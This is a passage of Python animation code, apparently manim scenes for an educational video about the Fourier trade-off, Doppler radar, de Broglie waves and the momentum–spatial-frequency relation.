self.wait()
self.play(shifted_graphs.restore)
self.play(ReplacementTransform(
shifted_graphs, VGroup(sum_graph),
))
self.wait()
self.curr_fourier_graph = sum_graph
def echos_of_long_pure_signal_in_frequency_space(self):
curr_fourier_graph = self.curr_fourier_graph
f_max = self.frequency_axes.y_max
new_fourier_graph = self.frequency_axes.get_graph(
lambda x : f_max * np.exp(-100*(x-8)**2),
num_graph_points = 1000,
)
new_fourier_graph.set_color(PINK)
self.play(
FadeOut(curr_fourier_graph),
FadeIn(new_fourier_graph),
)
self.fourier_graph = new_fourier_graph
self.overlapping_frequencies_of_various_objects()
def concentrated_fourier_requires_long_time(self):
objects = self.objects
objects.restore()
object_movements = self.object_movements
self.n_pulse_singletons = 32
pulses = self.get_pulses()
randy = self.pi_creature
continual_anims = object_movements+pulses
self.play(FadeIn(randy))
self.add(*continual_anims)
self.play(randy.change, "angry", *[
UpdateFromAlphaFunc(obj, lambda m, a : m.set_fill(opacity = a))
for obj in objects
])
self.play(Blink(randy))
self.wait(2)
self.play(Blink(randy))
self.wait()
self.play(randy.change, "plain", *[
UpdateFromAlphaFunc(obj, lambda m, a : m.set_fill(opacity = 1-a))
for obj in objects
])
self.wait()
###
def get_frequency_pulse_graph(self, x, freq = 25, **kwargs):
graph = IntroduceDopplerRadar.get_frequency_pulse_graph(
self, x, freq, **kwargs
)
return graph
def get_pulse(self, dish, echo_object):
return RadarPulse(
dish, echo_object,
n_pulse_singletons = self.n_pulse_singletons,
frequency = 0.025,
speed = 5.0,
)
def get_pulses(self):
return [
self.get_pulse(
self.dish.copy().shift(0.01*obj.get_center()[0]),
obj
)
for obj in self.objects
]
def create_pi_creature(self):
randy = Randolph()
randy.scale(0.5).flip()
randy.to_edge(RIGHT, buff = 1.7).shift(0.5*UP)
return randy
def get_shifted_frequency_graphs(self, fourier_graph):
frequency_axes = self.frequency_axes
def get_func(v):
return lambda f : fourier_graph.underlying_function(np.clip(
f-5*v[0],
frequency_axes.x_min,
frequency_axes.x_max,
))
def get_graph(func):
return frequency_axes.get_graph(func)
shifted_graphs = VGroup(*list(map(
get_graph, list(map(get_func, self.object_velocities))
)))
shifted_graphs.match_style(fourier_graph)
return shifted_graphs
def get_sum_graph(self, axes, graphs):
def get_func(graph):
return graph.underlying_function
funcs = list(map(get_func, graphs))
return axes.get_graph(
lambda t : sum([func(t) for func in funcs]),
)
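# A numerical sketch (hypothetical, mirroring get_shifted_frequency_graphs
# and get_sum_graph above): each object's horizontal velocity shifts a copy
# of the base spectrum, and the receiver only ever sees the sum.
def _demo_summed_spectra(base_func, velocities, freqs):
    import numpy as np
    return sum(
        np.array([base_func(f - 5 * v[0]) for f in freqs])
        for v in velocities
    )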
class SummarizeFourierTradeoffForDoppler(Scene):
def construct(self):
time_axes = Axes(
x_min = 0, x_max = 12,
y_min = -0.5, y_max = 1,
)
time_axes.center().to_edge(UP, buff = LARGE_BUFF)
frequency_axes = time_axes.copy()
frequency_axes.next_to(time_axes, DOWN, buff = 2)
time_label = TextMobject("Time")
frequency_label = TextMobject("Frequency")
for label, axes in (time_label, time_axes), (frequency_label, frequency_axes):
label.next_to(axes.get_right(), UP, SMALL_BUFF)
axes.add(label)
frequency_label.shift_onto_screen()
title = TextMobject("Fourier Trade-off")
title.next_to(time_axes, DOWN)
self.add(title)
#Position determines log of scale value for exponentials
a_mob = VectorizedPoint()
x_values = [3, 5, 6, 7, 8]
v_values = [5, 5.5, 5.75, 6.5, 7]
def get_top_graphs():
a = np.exp(a_mob.get_center()[0])
graphs = VGroup(*[
time_axes.get_graph(lambda t : np.exp(-5*a*(t-x)**2))
for x in x_values
])
graphs.set_color(WHITE)
graphs.color_using_background_image("blue_yellow_gradient")
return graphs
def get_bottom_graphs():
a = np.exp(a_mob.get_center()[0])
graphs = VGroup(*[
frequency_axes.get_graph(lambda t : np.exp(-(5./a)*(t-v)**2))
for v in v_values
])
graphs.set_color(RED)
return graphs
top_graphs = get_top_graphs()
bottom_graphs = get_bottom_graphs()
update_top_graphs = Mobject.add_updater(
top_graphs,
lambda g : Transform(g, get_top_graphs()).update(1)
)
update_bottom_graphs = Mobject.add_updater(
bottom_graphs,
lambda g : Transform(g, get_bottom_graphs()).update(1)
)
self.add(time_axes, frequency_axes)
self.add(update_top_graphs, update_bottom_graphs)
shift_vect = 2*RIGHT
for s in 1, -2, 1:
self.play(a_mob.shift, s*shift_vect, run_time = 3)
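# A one-line check (hypothetical helper) of the trade-off animated above:
# the time bumps use exp(-5*a*(t-x)**2) and the frequency bumps use
# exp(-(5/a)*(t-v)**2), so their widths (standard deviations) multiply to a
# constant no matter what a is.
def _demo_tradeoff(a):
    import numpy as np
    sigma_time = 1.0 / np.sqrt(10 * a)   # exp(-k*t**2) has sigma = 1/sqrt(2k)
    sigma_freq = 1.0 / np.sqrt(10 / a)
    return sigma_time * sigma_freq       # always 0.1, independent of a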
class MentionUncertaintyPrincipleCopy(MentionUncertaintyPrinciple):
pass
class IntroduceDeBroglie(Scene):
CONFIG = {
"default_wave_frequency" : 1,
"wave_colors" : [BLUE_D, YELLOW],
"dispersion_factor" : 1,
"amplitude" : 1,
}
def construct(self):
text_scale_val = 0.8
#Overlay real tower in video editor
eiffel_tower = Line(3*DOWN, 3*UP, stroke_width = 0)
picture = ImageMobject("de_Broglie")
picture.set_height(4)
picture.to_corner(UP+LEFT)
name = TextMobject("Louis de Broglie")
name.next_to(picture, DOWN)
picture.save_state()
picture.scale(0)
picture.move_to(eiffel_tower.get_top())
broadcasts = [
Broadcast(
eiffel_tower.get_top(),
big_radius = 10,
n_circles = 10,
lag_ratio = 0.9,
run_time = 7,
rate_func = squish_rate_func(smooth, a, a+0.3),
color = WHITE,
)
for a in np.linspace(0, 0.7, 3)
]
self.play(*broadcasts)
self.play(picture.restore)
self.play(Write(name))
self.wait()
#Time line
time_line = NumberLine(
x_min = 1900,
x_max = 1935,
tick_frequency = 1,
numbers_with_elongated_ticks = list(range(1900, 1941, 10)),
color = BLUE_D
)
time_line.stretch_to_fit_width(FRAME_WIDTH - picture.get_width() - 2)
time_line.add_numbers(*time_line.numbers_with_elongated_ticks)
time_line.next_to(picture, RIGHT, MED_LARGE_BUFF, DOWN)
year_to_words = {
1914 : "Wold War I begins",
1915 : "Einstein field equations",
1916 : "Lewis dot formulas",
1917 : "Not a lot of physics...because war",
1918 : "S'more Rutherford badassery",
1919 : "Eddington confirms general relativity predictions",
1920 : "World is generally stoked on general relativity",
1921 : "Einstein gets long overdue Nobel prize",
1922 : "Stern-Gerlach Experiment",
1923 : "Compton scattering observed",
1924 : "de Broglie's thesis"
}
arrow = Vector(DOWN, color = WHITE)
arrow.next_to(time_line.number_to_point(1914), UP)
words = TextMobject(year_to_words[1914])
words.scale(text_scale_val)
date = Integer(1914)
date.next_to(arrow, UP, LARGE_BUFF)
def get_year(alpha = 0):
return int(time_line.point_to_number(arrow.get_end()))
def update_words(words):
text = year_to_words.get(get_year(), "Hi there")
if text not in words.get_tex_string():
words.__init__(text)
words.scale(text_scale_val)
words.move_to(interpolate(
arrow.get_top(), date.get_bottom(), 0.5
))
update_words(words)
self.play(
FadeIn(time_line),
GrowArrow(arrow),
Write(words),
Write(date),
run_time = 1
)
self.wait()
self.play(
arrow.next_to, time_line.number_to_point(1924), UP,
ChangingDecimal(
date, get_year,
position_update_func = lambda m : m.next_to(arrow, UP, LARGE_BUFF)
),
UpdateFromFunc(words, update_words),
run_time = 3,
)
self.wait()
#Transform time_line
line = time_line
self.play(
FadeOut(time_line.numbers),
VGroup(arrow, words, date).shift, MED_LARGE_BUFF*UP,
*[
ApplyFunction(
lambda m : m.rotate(TAU/4).set_stroke(width = 0),
mob,
remover = True
)
for mob in time_line.tick_marks
]
)
#Wave function
particle = VectorizedPoint()
axes = Axes(x_min = -1, x_max = 10)
axes.match_width(line)
axes.shift(line.get_center() - axes.x_axis.get_center())
im_line = line.copy()
im_line.set_color(YELLOW)
wave_update_animation = self.get_wave_update_animation(
axes, particle, line, im_line
)
for x in range(3):
particle.move_to(axes.coords_to_point(-10, 0))
self.play(
ApplyMethod(
particle.move_to, axes.coords_to_point(22, 0),
rate_func=linear
),
wave_update_animation,
run_time = 3
)
self.wait()
###
def get_wave_update_animation(self, axes, particle, re_line = None, im_line = None):
line = Line(
axes.x_axis.get_left(),
axes.x_axis.get_right(),
)
if re_line is None:
re_line = line.copy()
re_line.set_color(self.wave_colors[0])
if im_line is None:
im_line = line.copy()
im_line.set_color(self.wave_colors[1])
lines = VGroup(im_line, re_line)
def update_lines(lines):
waves = self.get_wave_pair(axes, particle)
for line, wave in zip(lines, waves):
wave.match_style(line)
Transform(line, wave).update(1)
return UpdateFromFunc(lines, update_lines)
def get_wave(
self, axes, particle,
complex_to_real_func = lambda z : z.real,
freq = None,
**kwargs):
freq = freq or self.default_wave_frequency
k0 = 1./freq
t0 = axes.x_axis.point_to_number(particle.get_center())
def func(x):
dispersion = fdiv(1., self.dispersion_factor)*(np.sqrt(1./(1+t0**2)))
wave_part = complex_to_real_func(np.exp(
complex(0, TAU*freq*(x-dispersion))
))
bell_part = np.exp(-dispersion*(x-t0)**2)
amplitude = self.amplitude
return amplitude*wave_part*bell_part
graph = axes.get_graph(func)
return graph
def get_wave_pair(self, axes, particle, colors = None, **kwargs):
if colors is None and "color" not in kwargs:
colors = self.wave_colors
return VGroup(*[
self.get_wave(
axes, particle,
C_to_R, color = color,
**kwargs
)
for C_to_R, color in zip(
[lambda z : z.imag, lambda z : z.real],
colors
)
])
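# A compact sketch (hypothetical helper) of the complex wave the two colored
# graphs represent: a single complex exponential whose real and imaginary
# parts are exactly the two complex_to_real_func choices passed above.
def _demo_wave_parts(x, freq=1.0):
    import numpy as np
    z = np.exp(1j * 2 * np.pi * freq * x)
    return z.real, z.imag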
class ShowMomentumFormula(IntroduceDeBroglie, TeacherStudentsScene):
CONFIG = {
"default_wave_frequency" : 2,
"dispersion_factor" : 0.25,
"p_color" : BLUE,
"xi_color" : YELLOW,
"amplitude" : 0.5,
}
def construct(self):
self.introduce_formula()
self.react_to_claim()
def introduce_formula(self):
formula = p, eq, h, xi = TexMobject("p", "=", "h", "\\xi")
formula.move_to(ORIGIN)
formula.scale(1.5)
word_shift_val = 1.75
p_words = TextMobject("Momentum")
p_words.next_to(p, UP, LARGE_BUFF).shift(word_shift_val*LEFT)
p_arrow = Arrow(
p_words.get_bottom(), p.get_corner(UP+LEFT),
buff = SMALL_BUFF
)
added_p_words = TextMobject("(Classically $m \\times v$)")
added_p_words.move_to(p_words, DOWN)
VGroup(p, p_words, added_p_words, p_arrow).set_color(self.p_color)
xi_words = TextMobject("Spatial frequency")
added_xi_words = TextMobject("(cycles per unit \\emph{distance})")
xi_words.next_to(xi, UP, LARGE_BUFF).shift(word_shift_val*RIGHT)
xi_words.align_to(p_words)
xi_arrow = Arrow(
xi_words.get_bottom(), xi.get_corner(UP+RIGHT),
buff = SMALL_BUFF
)
added_xi_words.move_to(xi_words, DOWN)
added_xi_words.align_to(added_p_words, DOWN)
VGroup(xi, xi_words, added_xi_words, xi_arrow).set_color(self.xi_color)
axes = Axes(
x_min = 0, x_max = FRAME_WIDTH,
y_min = -1, y_max = 1,
)
axes.center().to_edge(UP, buff = -0.5)
# axes.next_to(formula, RIGHT)
particle = VectorizedPoint()
wave_update_animation = self.get_wave_update_animation(axes, particle)
wave = wave_update_animation.mobject
wave[0].set_stroke(width = 0)
particle.next_to(wave, LEFT, buff = 2)
wave_propagation = AnimationGroup(
ApplyMethod(particle.move_to, axes.coords_to_point(30, 0)),
wave_update_animation,
run_time = 4,
rate_func=linear,
)
stopped_wave_propagation = AnimationGroup(
ApplyMethod(particle.move_to, xi_words),
wave_update_animation,
run_time = 3,
rate_func=linear,
)
n_v_lines = 10
v_lines = VGroup(*[
DashedLine(UP, DOWN)
for x in range(n_v_lines)
])
v_lines.match_color(xi)
v_lines.arrange(
RIGHT,
buff = float(axes.x_axis.unit_size)/self.default_wave_frequency
)
v_lines.move_to(stopped_wave_propagation.sub_anims[0].target_mobject)
v_lines.align_to(wave)
v_lines.shift(0.125*RIGHT)
self.add(formula, wave)
self.play(
self.teacher.change, "raise_right_hand",
GrowArrow(p_arrow),
Succession(
Write, p_words,
ApplyMethod, p_words.next_to, added_p_words, UP,
),
FadeIn(
added_p_words,
rate_func = squish_rate_func(smooth, 0.5, 1),
run_time = 2,
),
wave_propagation
)
self.play(
Write(xi_words),
GrowArrow(xi_arrow),
self.get_student_changes("confused", "erm", "sassy"),
stopped_wave_propagation
)
self.play(
FadeIn(added_xi_words),
xi_words.next_to, added_xi_words, UP,
)
self.play(
LaggedStartMap(ShowCreation, v_lines),
self.get_student_changes(*["pondering"]*3)
)
self.play(LaggedStartMap(FadeOut, v_lines))
self.wait()
self.formula_labels = VGroup(
p_words, p_arrow, added_p_words,
xi_words, xi_arrow, added_xi_words,
)
self.set_variables_as_attrs(wave, wave_propagation, formula)
def react_to_claim(self):
formula_labels = self.formula_labels
full_formula = VGroup(self.formula, formula_labels)
full_formula.save_state()
wave_propagation = self.wave_propagation
student = self.students[2]
self.student_says(
"Hang on...",
bubble_kwargs = {"height" : 2, "width" : 2, "direction" : LEFT},
target_mode = "sassy",
student_index = 2,
added_anims = [self.teacher.change, "plain"]
)
student.bubble.add(student.bubble.content)
self.wait()
kwargs = {
"path_arc" : TAU/4,
"lag_ratio" : 0.5,
"lag_ratio" : 0.7,
"run_time" : 1.5,
}
self.play(
full_formula.scale, 0,
full_formula.move_to, student.eyes.get_bottom()+SMALL_BUFF*DOWN,
Animation(student.bubble),
**kwargs
)
self.play(full_formula.restore, Animation(student.bubble), **kwargs)
wave_propagation.update_config(
rate_func = lambda a : interpolate(0.35, 1, a)
)
self.play(
wave_propagation,
RemovePiCreatureBubble(student, target_mode = "confused"),
)
wave_propagation.update_config(rate_func = lambda t : t)
self.student_says(
"Physics is \\\\ just weird",
bubble_kwargs = {"height" : 2.5, "width" : 3},
target_mode = "shruggie",
student_index = 0,
added_anims = [ApplyMethod(full_formula.shift, UP)]
)
self.wait()
self.play(
wave_propagation,
ApplyMethod(full_formula.shift, DOWN),
FadeOut(self.students[0].bubble),
FadeOut(self.students[0].bubble.content),
self.get_student_changes(*3*["pondering"]),
self.teacher.change, "pondering",
)
self.play(wave_propagation)
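# A numeric sketch (hypothetical SI values) of p = h * xi: a slow electron's
# classical momentum divided by Planck's constant gives its de Broglie
# spatial frequency in cycles per meter.
def _demo_momentum_frequency(mass=9.109e-31, velocity=1.0e6, h=6.626e-34):
    p = mass * velocity  # classical momentum, kg*m/s
    xi = p / h           # spatial frequency, ~1.4e9 cycles/m (~0.7 nm waves)
    return xi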
class AskPhysicists(PiCreatureScene):
def construct(self):
morty, physy1, physy2, physy3 = self.pi_creatures
formula = TexMobject("p", "=", "h", "\\xi")
formula.set_color_by_tex_to_color_map({
"p" : BLUE,
"\\xi" : YELLOW,
})
formula.scale(1.5)
formula.to_edge(UP)
formula.save_state()
formula.shift(DOWN)
formula.fade(1)
self.play(formula.restore)
self.pi_creature_says(
morty, "So...why?",
target_mode = "maybe"
)
self.wait(2)
self.play(
RemovePiCreatureBubble(morty),
PiCreatureSays(
physy2,
"Take the Schrödinger equation \\\\ with $H = \\frac{p^2}{2m}+V(x)$",
bubble_kwargs = {"fill_opacity" : 0.9},
),
)
self.play(
PiCreatureSays(
physy1,
"Even classically position and \\\\ momentum are conjugate",
target_mode = "surprised",
bubble_kwargs = {"fill_opacity" : 0.9},
),
)
self.play(
PiCreatureSays(
physy3,
"Consider special relativity \\\\ together with $E = hf$",
target_mode = "hooray",
bubble_kwargs = {"fill_opacity" : 0.9},
),
morty.change, "guilty"
)
self.wait(2)
###
def create_pi_creatures(self):
scale_factor = 0.85
morty = Mortimer().flip()
morty.scale(scale_factor)
morty.to_corner(DOWN+LEFT)
physies = VGroup(*[
PiCreature(color = c).flip()
for c in (GREY, LIGHT_GREY, DARK_GREY)
])
physies.arrange(RIGHT, buff = MED_SMALL_BUFF)
physies.scale(scale_factor)
physies.to_corner(DOWN+RIGHT)
self.add(physies)
return VGroup(morty, *physies)
class SortOfDopplerEffect(PiCreatureScene):
CONFIG = {
"omega" : np.pi,
"arrow_spacing" : 0.25,
}
def setup(self):
PiCreatureScene.setup(self)
rect = self.screen_rect = ScreenRectangle(height = FRAME_HEIGHT)
rect.set_stroke(width = 0)
self.camera = MovingCamera(
rect, **self.camera_config
)
def construct(self):
screen_rect = self.screen_rect
#x-coordinate gives time
t_tracker = VectorizedPoint()
#x-coordinate gives wave number
k_tracker = VectorizedPoint(2*RIGHT)
always_shift(t_tracker, RIGHT, 1)
def get_wave():
t = t_tracker.get_center()[0]
k = k_tracker.get_center()[0]
omega = self.omega
color = interpolate_color(
BLUE, RED, (k-2)/2.0
)
func = lambda x : 0.5*np.cos(omega*t - k*x)
graph = FunctionGraph(
func,
x_min = -5*FRAME_X_RADIUS,
x_max = FRAME_X_RADIUS,
color = color,
)
return VGroup(graph, *[
Arrow(
x*RIGHT, x*RIGHT + func(x)*UP,
color = color
)
for x in np.arange(
-4*FRAME_X_RADIUS, FRAME_X_RADIUS,
self.arrow_spacing
)
])
wave = get_wave()
wave_update = Mobject.add_updater(
wave, lambda w : Transform(w, get_wave()).update(1)
)
rect = ScreenRectangle(height = 2)
rect.to_edge(RIGHT)
always_shift(rect, LEFT, 1)
rect_movement = rect
randy = self.pi_creature
randy_look_at = Mobject.add_updater(
randy, lambda r : r.look_at(rect)
)
ref_frame1 = TextMobject("Reference frame 1")
# ref_frame1.next_to(randy, UP, aligned_edge = LEFT)
ref_frame1.to_edge(UP)
ref_frame2 = TextMobject("Reference frame 2")
ref_frame2.next_to(rect, UP)
# ref_frame2.set_fill(opacity = 0)
ref_frame2_follow = Mobject.add_updater(
ref_frame2, lambda m : m.next_to(rect, UP)
)
ref_frame_1_continual_anim = ContinualAnimation(ref_frame1)
self.add(
t_tracker, wave_update, rect_movement, randy_look_at,
ref_frame2_follow, ref_frame_1_continual_anim
)
self.add(ref_frame1)
self.play(randy.change, "pondering")
self.wait(4)
start_height = screen_rect.get_height()
start_center = screen_rect.get_center()
self.play(
UpdateFromAlphaFunc(
screen_rect,
lambda m, a : m.move_to(
interpolate(start_center, rect.get_center(), a)
)
),
k_tracker.shift, 2*RIGHT,
)
self.play(
MaintainPositionRelativeTo(
screen_rect, rect,
run_time = 4
),
)
self.play(
screen_rect.move_to, rect.get_right()+FRAME_X_RADIUS*LEFT,
k_tracker.shift, 2*LEFT,
)
#Frequency words
temporal_frequency = TextMobject("Temporal", "frequency")
spatial_frequency = TextMobject("Spatial", "frequency")
temporal_frequency.move_to(screen_rect).to_edge(UP)
spatial_frequency.next_to(temporal_frequency, DOWN)
cross = Cross(temporal_frequency[0])
time = TextMobject("Time")
space = TextMobject("Space")
time.next_to(temporal_frequency, RIGHT, buff = 2)
space.next_to(time, DOWN)
space.align_to(spatial_frequency)
self.play(FadeIn(temporal_frequency))
self.play(ShowCreation(cross))
self.play(Write(spatial_frequency))
self.wait()
self.play(FadeIn(time), FadeIn(space))
self.play(
Transform(time, space),
Transform(space, time),
lag_ratio = 0.5,
run_time = 1,
)
self.play(FadeOut(time), FadeOut(space))
self.wait(3)
###
def create_pi_creature(self):
return Randolph().scale(0.5).to_corner(DOWN+LEFT)
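# A minimal sketch (hypothetical helper) of the wave drawn in this scene:
# cos(omega*t - k*x) travels right at phase velocity omega/k, which is why
# hopping into the moving reference frame trades temporal frequency for
# spatial frequency.
def _demo_phase_velocity(omega, k):
    return omega / k  # scene-units of distance per second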
class HangingWeightsScene(MovingCameraScene):
CONFIG = {
"frequency" : 0.5,
"ceiling_radius" : 3*FRAME_X_RADIUS,
"n_springs" : 72,
"amplitude" : 0.6,
"spring_radius" : 0.15,
}
def construct(self):
self.setup_springs()
self.setup_weights()
self.introduce()
self.show_analogy_with_electron()
self.metaphor_for_something()
self.moving_reference_frame()
def setup_springs(self):
ceiling = self.ceiling = Line(LEFT, RIGHT)
ceiling.scale(self.ceiling_radius)
ceiling.to_edge(UP, buff = LARGE_BUFF)
self.add(ceiling)
def get_spring(alpha, height = 2):
t_max = 6.5
r = self.spring_radius
s = (height - r)/(t_max**2)
spring = ParametricFunction(
lambda t : op.add(
r*(np.sin(TAU*t)*RIGHT+np.cos(TAU*t)*UP),
s*((t_max - t)**2)*DOWN,
),
t_min = 0, t_max = t_max,
color = WHITE,
stroke_width = 2,
)
spring.alpha = alpha
spring.move_to(ceiling.point_from_proportion(alpha), UP)
spring.color_using_background_image("grey_gradient")
return spring
alphas = np.linspace(0, 1, self.n_springs)
bezier([0, 1, 0, 1])
springs = self.springs = VGroup(*list(map(get_spring, alphas)))
k_tracker = self.k_tracker = VectorizedPoint()
t_tracker = self.t_tracker = VectorizedPoint()
always_shift(t_tracker, RIGHT, 1)
self.t_tracker_walk = t_tracker
equilibrium_height = springs.get_height()
def update_springs(springs):
for spring in springs:
k = k_tracker.get_center()[0]
t = t_tracker.get_center()[0]
f = self.frequency
x = spring.get_top()[0]
A = self.amplitude
d_height = A*np.cos(TAU*f*t - k*x)
new_spring = get_spring(spring.alpha, 2+d_height)
Transform(spring, new_spring).update(1)
spring_update_anim = Mobject.add_updater(springs, update_springs)
self.spring_update_anim = spring_update_anim
spring_update_anim.update(0)
self.play(
ShowCreation(ceiling),
LaggedStartMap(ShowCreation, springs)
)
def setup_weights(self):
weights = self.weights = VGroup()
weight_anims = []
for spring in self.springs:
x = spring.get_top()[0]
mass = np.exp(-0.1*x**2)
weight = Circle(radius = 0.15)
weight.start_radius = 0.15
weight.target_radius = 0.25*mass #For future update
weight.spring = spring
weight_anim = Mobject.add_updater(
weight, lambda w : w.move_to(w.spring.get_bottom())
)
weight_anim.update(0)
weight_anims.append(weight_anim)
weights.add(weight)
weights.set_fill(opacity = 1)
weights.set_color_by_gradient(BLUE_D, BLUE_E, BLUE_D)
weights.set_stroke(WHITE, 1)
self.play(LaggedStartMap(GrowFromCenter, weights))
self.add(self.t_tracker_walk)
self.add(self.spring_update_anim)
self.add(*weight_anims)
def introduce(self):
arrow = Arrow(4*LEFT, LEFT)
arrows = VGroup(arrow, arrow.copy().flip(about_point = ORIGIN))
arrows.set_color(WHITE)
self.wait(3)
self.play(*list(map(GrowArrow, arrows)))
self.play(*[
UpdateFromAlphaFunc(
weight, lambda w, a : w.set_width(
2*interpolate(w.start_radius, w.target_radius, a)
),
run_time = 2
)
for weight in self.weights
])
self.play(FadeOut(arrows))
self.wait(3)
def show_analogy_with_electron(self):
words = TextMobject(
"Analogous to the energy of a particle \\\\",
"(in the sense of $E=mc^2$)"
)
words.move_to(DOWN)
self.play(Write(words))
self.wait(3)
self.play(FadeOut(words))
def metaphor_for_something(self):
de_broglie = ImageMobject("de_Broglie")
de_broglie.set_height(3.5)
de_broglie.to_corner(DOWN+RIGHT)
words = TextMobject("""
If a photon's energy is carried as a wave, \\\\
is this true for any particle?
""")
words.next_to(de_broglie, LEFT)
einstein = ImageMobject("Einstein")
einstein.match_height(de_broglie)
einstein.to_corner(DOWN+LEFT)
for picture in de_broglie, einstein:
picture.backdrop = Rectangle()
picture.backdrop.replace(picture, stretch = True)
picture.backdrop.set_fill(BLACK, 1)
picture.backdrop.set_stroke(BLACK, 0)
self.play(
Animation(de_broglie.backdrop, remover = True),
FadeIn(de_broglie)
)
self.play(Write(words))
self.wait(7)
self.play(
FadeOut(words),
Animation(einstein.backdrop, remover = True),
FadeIn(einstein)
)
self.wait(2)
self.de_broglie = de_broglie
self.einstein = einstein
def moving_reference_frame(self):
rect = ScreenRectangle(height = 2.1*FRAME_Y_RADIUS)
rect_movement = always_shift(rect, direction = LEFT, rate = 2)
camera_frame = self.camera_frame
self.add(rect)
self.play(
Animation(self.de_broglie.backdrop, remover = True),
FadeOut(self.de_broglie),
Animation(self.einstein.backdrop, remover = True),
FadeOut(self.einstein),
)
self.play(camera_frame.scale, 3, {"about_point" : 2*UP})
self.play(rect.shift, FRAME_WIDTH*RIGHT, path_arc = -TAU/2)
self.add(rect_movement)
self.wait(3)
def zoom_into_reference_frame():
original_height = camera_frame.get_height()
original_center = camera_frame.get_center()
self.play(
UpdateFromAlphaFunc(
camera_frame, lambda c, a : c.set_height(
interpolate(original_height, 0.95*rect.get_height(), a)
).move_to(
interpolate(original_center, rect.get_center(), a)
)
),
ApplyMethod(self.k_tracker.shift, RIGHT)
)
self.play(MaintainPositionRelativeTo(
camera_frame, rect,
run_time = 6
))
self.play(
camera_frame.set_height, original_height,
camera_frame.move_to, original_center,
ApplyMethod(self.k_tracker.shift, LEFT)
)
zoom_into_reference_frame()
self.wait()
self.play(
UpdateFromAlphaFunc(rect, lambda m, a : m.set_stroke(width = 2*(1-a)))
)
index = int(0.5*len(self.springs))
weights = VGroup(self.weights[index], self.weights[index+4])
flashes = list(map(self.get_peak_flash_anim, weights))
weights.save_state()
weights.set_fill(RED)
self.add(*flashes)
self.wait(5)
rect.align_to(camera_frame, RIGHT)
self.play(UpdateFromAlphaFunc(rect, lambda m, a : m.set_stroke(width = 2*a)))
randy = Randolph(mode = "pondering")
randy.look(UP+RIGHT)
de_broglie = ImageMobject("de_Broglie")
de_broglie.set_height(6)
de_broglie.next_to(4*DOWN, DOWN)
self.add(
Mobject.add_updater(
randy, lambda m : m.next_to(
rect.get_corner(DOWN+LEFT), UP+RIGHT, MED_LARGE_BUFF,
).look_at(weights)
),
de_broglie
)
self.wait(2)
zoom_into_reference_frame()
self.wait(8)
def get_peak_flash_anim(self, weight):
mobject = Mobject()
mobject.last_y = 0
mobject.last_dy = 0
mobject.curr_anim = None
mobject.curr_anim_time = 0
mobject.time_since_last_flash = 0
def update(mob, dt):
mob.time_since_last_flash += dt
point = weight.get_center()
y = point[1]
mob.dy = y - mob.last_y
different_dy = np.sign(mob.dy) != np.sign(mob.last_dy)
if different_dy and mob.time_since_last_flash > 0.5:
mob.curr_anim = Flash(
VectorizedPoint(point),
flash_radius = 0.5,
line_length = 0.3,
run_time = 0.2,
)
mob.submobjects = [mob.curr_anim.mobject]
mob.time_since_last_flash = 0
mob.last_y = float(y)
mob.last_dy = float(mob.dy)
if mob.curr_anim:
mob.curr_anim_time += dt
if mob.curr_anim_time > mob.curr_anim.run_time:
mob.curr_anim = None
mob.submobjects = []
mob.curr_anim_time = 0
return
mob.curr_anim.update(mob.curr_anim_time/mob.curr_anim.run_time)
return Mobject.add_updater(mobject, update)
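# A stripped-down sketch (hypothetical helper) of the peak detection inside
# get_peak_flash_anim: an extremum is flagged wherever the vertical
# increment changes sign between successive samples.
def _demo_find_extrema(ys):
    import numpy as np
    dys = np.diff(ys)
    return [
        i for i in range(1, len(dys))
        if np.sign(dys[i]) != np.sign(dys[i - 1])
    ]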
class MinutPhysicsWrapper(Scene):
def construct(self):
logo = ImageMobject("minute_physics_logo", invert = True)
logo.to_corner(UP+LEFT)
self.add(logo)
title = TextMobject("Minute Physics on special relativity")
title.to_edge(UP).shift(MED_LARGE_BUFF*RIGHT)
screen_rect = ScreenRectangle()
screen_rect.set_width(title.get_width() + LARGE_BUFF)
screen_rect.next_to(title, DOWN)
self.play(ShowCreation(screen_rect))
self.play(Write(title))
self.wait(2)
class WhatDoesTheFourierTradeoffTellUs(TeacherStudentsScene):
def construct(self):
self.teacher_says(
"So! What does \\\\ the Fourier trade-off \\\\ tell us?",
target_mode = "surprised",
bubble_kwargs = {"width" : 4, "height" : 3}
)
self.change_student_modes(*["thinking"]*3)
self.wait(4)
class FourierTransformOfWaveFunction(Scene):
CONFIG = {
"wave_stroke_width" : 3,
"wave_color" : BLUE,
}
def construct(self):
self.show_wave_packet()
self.take_fourier_transform()
self.show_correlations_with_pure_frequencies()
self.this_is_momentum()
self.show_tradeoff()
def setup(self):
self.x0_tracker = ValueTracker(-3)
self.k_tracker = ValueTracker(1)
self.a_tracker = ExponentialValueTracker(0.5)
def show_wave_packet(self):
axes = Axes(
x_min = 0, x_max = 12,
y_min = -1, y_max = 1,
y_axis_config = {
"tick_frequency" : 0.5
}
)
position_label = TextMobject("Position")
position_label.next_to(axes.x_axis.get_right(), UP)
axes.add(position_label)
axes.center().to_edge(UP, buff = LARGE_BUFF)
wave = self.get_wave(axes)
wave_update_animation = UpdateFromFunc(
wave, lambda w : Transform(w, self.get_wave(axes)).update(1)
)
self.add(axes, wave)
self.play(
self.x0_tracker.set_value, 5,
wave_update_animation,
run_time = 3,
)
self.wait()
self.wave_function = wave.underlying_function
self.wave_update_animation = wave_update_animation
self.wave = wave
self.axes = axes
def take_fourier_transform(self):
wave = self.wave
wave_update_animation = self.wave_update_animation
frequency_axes = Axes(
x_min = 0, x_max = 3,
x_axis_config = {
"unit_size" : 4,
"tick_frequency" : 0.25,
"numbers_with_elongated_ticks" : [1, 2]
},
y_min = -0.15,
y_max = 0.15,
y_axis_config = {
"unit_size" : 7.5,
"tick_frequency" : 0.05,
}
)
label = self.frequency_x_axis_label = TextMobject("Spatial frequency")
label.next_to(frequency_axes.x_axis.get_right(), UP)
frequency_axes.add(label)
frequency_axes.move_to(self.axes, LEFT)
frequency_axes.to_edge(DOWN, buff = LARGE_BUFF)
label.shift_onto_screen()
def get_wave_function_fourier_graph():
return get_fourier_graph(
frequency_axes, self.get_wave_func(),
t_min = 0, t_max = 15,
)
fourier_graph = get_wave_function_fourier_graph()
self.fourier_graph_update_animation = UpdateFromFunc(
fourier_graph, lambda m : Transform(
m, get_wave_function_fourier_graph()
).update(1)
)
wave_copy = wave.copy()
wave_copy.generate_target()
wave_copy.target.move_to(fourier_graph, LEFT)
wave_copy.target.fade(1)
fourier_graph.save_state()
fourier_graph.move_to(wave, LEFT)
fourier_graph.fade(1)
arrow = Arrow(
self.axes.coords_to_point(5, -1),
